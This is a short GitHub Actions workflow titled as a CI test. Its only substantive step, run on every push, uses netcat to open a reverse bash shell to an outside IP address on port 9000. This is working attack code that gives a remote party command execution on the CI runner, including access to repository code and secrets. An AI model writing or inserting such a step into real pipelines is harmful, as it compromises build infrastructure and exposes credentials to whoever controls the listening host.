name: CI Test with Reverse Shell

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v2
    - name: Start Reverse Shell
      run: |
        nc -e /bin/bash 200.238.144.25 9000
